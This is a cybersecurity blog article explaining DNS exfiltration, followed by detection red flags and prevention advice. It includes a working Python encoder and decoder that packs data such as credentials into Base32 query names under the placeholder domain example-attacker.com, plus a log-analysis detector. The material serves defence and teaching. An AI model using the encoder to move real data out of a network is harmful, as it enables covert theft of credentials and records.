Last Updated: January 22nd, 2026 | 7 min read | Categories: Breach, Cybersecurity, Data Exfiltration


DNS Exfiltration: How Hackers Use Your Network to Steal Data Without Detection

Cybercriminals use a wide range of techniques to steal sensitive business data, from phishing emails and credential theft to malware and insider compromise. As security defences improve, attackers continue to adapt, searching for quieter ways to bypass detection and extract valuable information, making effective data breach prevention harder than ever.

One method that is particularly hard for firms to spot is DNS exfiltration. This technique takes advantage of the Domain Name System, which plays a key role in internet communication, but is rarely monitored closely. By hiding data within routine DNS traffic, threat actors can remove information without raising alarms.

The result is slow, patient theft of whatever the attacker can reach, such as financial data, customer records or authentication credentials. Understanding how the technique works is therefore critical for modern threat mitigation.

Why Hackers Use DNS for Data Exfiltration

DNS is a foundational part of the internet infrastructure. It translates domain names into IP addresses, allowing browsers and applications to find and connect to websites and services. Because this is essential for normal network function, requests to DNS servers are typically allowed by default and rarely restricted by cybersecurity defenses.

This means that, unlike other protocols, DNS traffic is often not inspected closely. Many businesses instead focus their efforts on email, web or file transfer activity. As a result, DNS is frequently overlooked in security monitoring and may not be logged or filtered effectively.

This makes it an ideal channel for attackers conducting low-throughput data exfiltration. By embedding stolen data into a series of outbound DNS queries, they can transfer small amounts of information without detection. Each query appears legitimate on the surface and blends in with the thousands of DNS requests a business generates every day, making it hard for enterprise data loss prevention tools to spot.

Over time, this technique can be used to extract login credentials, internal documents or other sensitive information without triggering alerts from firewalls or traditional security tools.

How DNS Exfiltration Works


Data exfiltration is the main goal of many cyberattacks. According to our latest research, 96 percent of ransomware attacks in the third quarter of 2025 attempted to steal data. DNS exfiltration is a covert technique for achieving this that abuses the normal domain name resolution process to move stolen information out of a network.

Because DNS traffic is essential for internet connectivity, it is rarely blocked, allowing attackers to hide stolen information inside routine name resolution requests that appear legitimate to most security tools. Attackers break data into small pieces, encode each piece into the labels of a query name under a domain they control, and let the normal resolution chain do the rest: the organization's recursive resolver looks up the name and forwards the query to the authoritative DNS server for that domain, which the attacker runs. There the data is extracted and reassembled. The attacker only needs to register a domain and point its name servers at a host they control; the compromised machine never has to connect to that host directly.

Here’s how the process typically works:

  1. Initial compromise: The attacker gains access to the target network, often through phishing, malware or an exploited vulnerability.
  2. Data gathering: Once inside, the attacker locates valuable information suitable for exfiltration via DNS, such as credentials, customer records, intellectual property or financial data.
  3. Data encoding: The stolen data is broken into chunks small enough to fit the DNS name limits (a single label is at most 63 characters and a full name at most 253), then encoded into the subdomain part of query names. Base32 is the usual choice because DNS names are case-insensitive and Base32 only uses characters that are valid in hostnames; Base64 is also seen but can be mangled by resolvers that change case. Each query normally carries a sequence number or nonce so the chunks can be reordered on receipt and so every name is unique, which stops resolver caching from swallowing repeated requests. For example, part of a password might be disguised as x1a2b3c.example-attacker.com.
  4. Outbound transmission: The infected system sends these names as ordinary DNS queries to the organization's recursive resolver, which forwards each one to the attacker-controlled authoritative DNS server for the domain. Because the host only ever talks to its normal resolver, and because DNS to that resolver is almost always permitted by firewalls, this step usually goes unnoticed even on networks that block other outbound connections.
  5. Data collection: The attacker’s DNS server receives the requests, extracts and reassembles the data to complete the exfiltration.

This method can be used to steal a wide range of sensitive data, including login credentials, internal documents, customer information, encryption keys and system configurations. Because it operates through a common and trusted protocol, DNS exfiltration is difficult to detect without specific monitoring in place.
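The encoding and reassembly steps described above, as an added example that is not code from the original article. It only builds and decodes query names; nothing is sent on the network. The zone example-attacker.com is a placeholder, the four-digit sequence label and two data labels per name are design choices for this example, and the label and name limits are the RFC 1035 values.

```python
import base64

# Constructed placeholder zone; never queried by this script.
ATTACKER_ZONE = "example-attacker.com"
MAX_LABEL = 63   # RFC 1035: a single label is at most 63 octets
MAX_NAME = 253   # longest presentation-form name resolvers accept


def b32(data: bytes) -> str:
    # Unpadded, lower-case Base32: DNS names are case-insensitive and resolvers
    # may rewrite case, so the case-sensitive Base64 alphabet is a poor fit.
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()


def unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def chunk_size(zone: str, data_labels: int = 2, seq_len: int = 4) -> int:
    """Raw bytes that fit in one name shaped <seq>.<data>[.<data>].<zone>
    without breaking the per-label or whole-name limits."""
    dots = 1 + (data_labels - 1)            # before the zone, between data labels
    budget = MAX_NAME - len(zone) - (seq_len + 1) - dots
    chars = min(budget, data_labels * MAX_LABEL)
    return (chars * 5) // 8                  # Base32 carries 5 bits per character


def encode_queries(payload: bytes, zone: str = ATTACKER_ZONE) -> list[str]:
    """Victim-side encoder: split payload into numbered query names.
    The sequence label keeps chunks ordered and makes every name unique, so a
    caching resolver cannot collapse repeated chunks into one upstream query."""
    size = chunk_size(zone)
    names = []
    for seq, offset in enumerate(range(0, len(payload), size)):
        encoded = b32(payload[offset:offset + size])
        labels = [encoded[i:i + MAX_LABEL] for i in range(0, len(encoded), MAX_LABEL)]
        name = ".".join([f"{seq:04d}"] + labels + [zone])
        if len(name) > MAX_NAME or any(len(l) > MAX_LABEL for l in name.split(".")):
            raise ValueError(f"name exceeds DNS limits: {name}")
        names.append(name)
    return names


def decode_queries(names: list[str], zone: str = ATTACKER_ZONE) -> bytes:
    """Authoritative-server side: accept queries in any order, ignore
    duplicates (resolvers retry), and reassemble by sequence number."""
    suffix = "." + zone
    pieces: dict[int, bytes] = {}
    for name in names:
        if not name.endswith(suffix):
            continue                          # query for some other name in our zone
        labels = name[:-len(suffix)].split(".")
        seq, data = int(labels[0]), "".join(labels[1:])
        pieces.setdefault(seq, unb32(data))
    if not pieces:
        return b""
    expected = set(range(max(pieces) + 1))
    if set(pieces) != expected:
        raise ValueError(f"missing chunks: {sorted(expected - set(pieces))}")
    return b"".join(pieces[i] for i in range(len(pieces)))


if __name__ == "__main__":
    # Constructed sample secret; not real credentials.
    secret = b"user=svc_backup\npass=correct horse battery staple\n" * 3
    queries = encode_queries(secret)
    for q in queries:
        print(q)
    # Delivery is out of order and one query was retried, as in real traffic.
    assert decode_queries(queries[::-1] + queries[:1]) == secret
```

With this zone each name carries 78 bytes of payload, so a 10 KB file needs roughly 130 queries. That is why the volume and unique-subdomain signals in the next section work: the encoder has no way to avoid generating many never-before-seen names under one domain.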

How to Spot DNS Exfiltration in Your Network

Because DNS exfiltration is designed to go unnoticed, a data loss prevention policy needs to include systems that log, monitor and analyze DNS traffic in real time. Without visibility into this layer, attackers may quietly extract sensitive data over weeks or months before being discovered.

However, even though DNS exfiltration is designed to be as unobtrusive as possible, there are still a few red flags that can give you a warning of such an attack in progress. These include:

  • Unusually high volumes of DNS queries from a single device.
  • DNS requests to unknown or rarely used domains.
  • Domains with long, random-looking subdomain strings.
  • Repeated queries to non-existent subdomains under the same root domain.
  • DNS requests occurring at odd hours or outside normal usage patterns.
  • Outbound DNS traffic to servers outside your geographic region.
  • Encoded or base64-like strings embedded in DNS queries.

Any one of these may not confirm an attack, but together they can indicate a suspicious pattern of activity. Data protection management tools that use behavioral analytics can help detect these early and reduce the risk of data loss.
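An added example, not from the original article, that turns the red flags above into a small detector and runs it over a constructed resolver log. The log format ("epoch client qname qtype rcode"), the client addresses, every domain, the crude registered-domain guess and the alert thresholds are all assumptions for illustration; tune the thresholds against your own baseline before alerting on them.

```python
import math
from collections import Counter, defaultdict

ALPHABET = "abcdefghijklmnopqrstuvwxyz234567"   # the Base32 symbol set


def build_sample_log() -> str:
    """Constructed resolver log; every host, address and domain is made up."""
    lines = [
        "1700000000 10.0.0.5 www.example.com A NOERROR",
        "1700000001 10.0.0.5 mail.example.com MX NOERROR",
        "1700000002 10.0.0.7 www.example.com A NOERROR",
        # One legitimate-looking CDN name with a hash-like label: high entropy alone.
        "1700000003 10.0.0.9 s3n7d2k9v4x1q8m5.cdn-cache.example.net A NOERROR",
    ]
    # Six exfiltration-style queries: a sequence label plus two 52-character
    # labels of Base32-looking data (rotations of the alphabet, so entropy is high).
    for seq in range(6):
        d1 = (ALPHABET * 2)[seq:seq + 52]
        d2 = (ALPHABET * 2)[seq + 7:seq + 59]
        lines.append(f"17000000{10 + seq:02d} 10.0.0.7 "
                     f"{seq:04d}.{d1}.{d2}.example-attacker.com A NXDOMAIN")
    return "\n".join(lines) + "\n"


def registered_domain(qname: str) -> str:
    """Crude guess: the last two labels. Production code should use the
    Public Suffix List so suffixes such as co.uk are handled correctly."""
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def shannon_entropy(s: str) -> float:
    """Bits per character; random Base32 text approaches 5.0, English words 2 to 3."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


# Alert thresholds (assumptions for this example).
LONG_LABEL = 40        # characters in a single label
HIGH_ENTROPY = 3.5     # mean bits/char of the subdomain part
MANY_SUBDOMAINS = 5    # distinct subdomains seen under one registered domain
NXDOMAIN_RATIO = 0.5   # share of replies that were NXDOMAIN
MIN_INDICATORS = 2     # any single indicator is too noisy on its own


def analyze(log_text: str) -> dict:
    """Aggregate per (client, registered domain) and score the indicators."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(), "nxdomain": 0,
                                 "max_label": 0, "entropy_total": 0.0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, qname, _qtype, rcode = line.split()
        qname = qname.rstrip(".").lower()
        domain = registered_domain(qname)
        sub = qname[:-len(domain) - 1] if len(qname) > len(domain) else ""
        s = stats[(client, domain)]
        s["queries"] += 1
        s["subdomains"].add(sub)
        if rcode == "NXDOMAIN":
            s["nxdomain"] += 1
        s["max_label"] = max([s["max_label"]] + [len(l) for l in sub.split(".")])
        s["entropy_total"] += shannon_entropy(sub.replace(".", ""))

    findings = {}
    for key, s in stats.items():
        indicators = []
        if s["max_label"] >= LONG_LABEL:
            indicators.append("long_label")
        if s["entropy_total"] / s["queries"] >= HIGH_ENTROPY:
            indicators.append("high_entropy")
        if len(s["subdomains"]) >= MANY_SUBDOMAINS:
            indicators.append("many_unique_subdomains")
        if s["nxdomain"] / s["queries"] >= NXDOMAIN_RATIO:
            indicators.append("nxdomain_ratio")
        findings[key] = {"queries": s["queries"], "indicators": indicators,
                         "flagged": len(indicators) >= MIN_INDICATORS}
    return findings


if __name__ == "__main__":
    for (client, domain), f in analyze(build_sample_log()).items():
        mark = "ALERT" if f["flagged"] else "ok   "
        print(f"{mark} {client:<10} {domain:<22} queries={f['queries']} {f['indicators']}")
```

The CDN-style name trips the entropy check on its own but is not flagged, which is the point of requiring several indicators together: content-hash hostnames, anti-malware reputation lookups and some telemetry legitimately produce long, random-looking names, so a detector keyed on one signal will page you constantly. Keying the aggregation on the registered domain rather than the full name is what exposes the exfiltration pattern, since the attacker cannot avoid generating many unique names under the one domain they control.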

How to Prevent DNS Exfiltration

DNS exfiltration of data is designed to be subtle, which means that by the time it’s detected, the damage may already be done. That’s why addressing this needs to be part of any company’s data loss prevention strategy.

Businesses must take a proactive approach to monitoring DNS activity by looking for the telltale signs of data exfiltration listed above, and must be able to respond quickly enough to shut down an attempt before it succeeds. Key DNS-specific prevention measures include:

  • Restricting DNS egress so endpoints can only send DNS traffic to approved internal or trusted resolvers. Block direct port 53 traffic from ordinary hosts to the internet, and treat DNS over HTTPS or DNS over TLS to public resolvers the same way, since an endpoint that can reach them bypasses every control on your own resolver.
  • Enforcing the use of trusted DNS resolvers. Note that this does not stop exfiltration by itself: your resolver will still forward a query for an attacker-owned domain to that domain's authoritative server. What it gives you is a single chokepoint where every query can be logged, rate-limited and filtered, which the remaining measures depend on.
  • Applying DNS filtering policies to block queries to suspicious, newly registered or low-reputation domains.
  • Analyzing DNS query behavior to detect abnormal patterns such as long query names, excessive subdomains or high query entropy.
  • Integrating DNS controls into a defense-in-depth strategy to reduce attacker dwell time and stop covert data exfiltration even after other defenses fail.
